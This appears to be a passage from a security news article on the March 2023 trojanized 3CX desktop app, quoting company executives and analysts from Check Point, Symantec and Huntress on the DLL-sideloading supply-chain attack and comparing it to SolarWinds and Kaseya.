In a message early on March 30, 3CX CEO Nick Galea urged users to immediately uninstall the app, adding that Microsoft Windows Defender would do that automatically for users running the software. Galea urged customers that want the app's functionality to use the Web client version of the technology while the company works on delivering an update.

A security alert from 3CX CISO Pierre Jourdan identified the affected apps as Electron Windows App, shipped in Update 7, version numbers 18.12.407 & 18.12.416 and Electron Mac App version numbers 18.11.1213, 18.12.402, 18.12.407, & 18.12.416. "The issue appears to be one of the bundled libraries that we compiled into the Windows Electron App via GIT," Jourdan said.

**Attackers Likely Breached 3CX's Production Environment**

Neither Jourdan nor Galea's messages gave any indication of how the attacker managed to gain the access they needed to trojanize a signed 3CXDekstopApp.exe binary. But at least two security vendors that have analyzed the threat say it could have only happened if the attackers were in 3CX's development or build environment — in the same manner that SolarWinds was compromised.

"Although only 3CX has the complete picture of what happened, so far, from the forensics, we assess with high confidence that the threat actor had access to the production pipeline of 3CX," says Lotem Finkelstein, director of threat intelligence & research at Check Point Software. "The files are signed with 3CX certificates, the same as used for the previous benign versions. The code is built in a way that it keeps working as it normally should but also adds some malware."

Finkelstein says Check Point's investigation confirms that the Trojanized version of the 3CX DesktopApp is being delivered through either manual download or regular updates from the official system.

Dick O'Brien, principal intelligent analyst at Symantec Threat Hunter team, says the threat actor does not appear to have touched the main executable itself. Instead, the APT compromised two dynamic link libraries (DLLs) that were delivered along with the executable in the installer. 

"One DLL was replaced with a completely different file with the same name," O'Brien says. "The second was a Trojanized version of the legitimate DLL \[with\] the attackers essentially appending it with additional encrypted data." The attackers have used a technique, known as DLL sideloading, to trick the legitimate 3CX binary to load and execute the malicious DLL, he says.

O'Brien agrees that the attacker would have needed access to 3CX's production environment to pull off the hack. "How they did that remains unknown. But once they had access to the build environment, all they had to do was drop two DLLs into the build directory."

**Potentially Broad Impact**

Researchers at Huntress tracking the threat said they had so far sent out a total of 2,595 incident reports to customers warning them of hosts running susceptible versions of the 3CX desktop application. In these instances, the software matched the hash or identifier for one of the known bad applications. 

"The final stage of the attack chain as we know it is reaching out to the command-and-control servers, however, this appears to be on a set timer after seven days," says Huntress' Hammond. A Shodan search that Huntress conducted showed 242,519 publicly exposed 3CX systems, though the issue's impact is broader than just that set of targets.

"The updates received by the signed 3CX Desktop Application are coming from the legitimate 3CX update source, so at first blush, this looks normal," he adds. "Many end users did not expect the original and valid 3CX application to suddenly be setting off alarm bells from their antivirus or security products, and in the early timeline where there was not much information uncovered, and there was some confusion over whether the activity was malicious or not, he says.

**Shades of SolarWinds & Kaseya**

Hammond compares this incident to the breaches at SolarWinds and at Kaseya. 

With SolarWinds, attackers — likely linked with Russia's Foreign Intelligence Service — broke into the company's build environment and inserted a few lines of malicious code into updates for its Orion network management software. Some 18,000 customers received the updates, but the threat actor was really targeting only a small handful of them for subsequent compromise. 

The attack on Kaseya's VSA remote management technology resulted in more than 1,000 downstream customers of its managed service provider customers being impacted and subsequently targeted for ransomware delivery. The two attacks are examples of a growing trend of threat actors targeting trusted software providers and entities in the software supply chain to reach a broad set of victims. Concerns over the threat prompted President Biden to issue an executive order in May 2021 that contained specific requirements for bolstering supply chain security.

Tag

#intel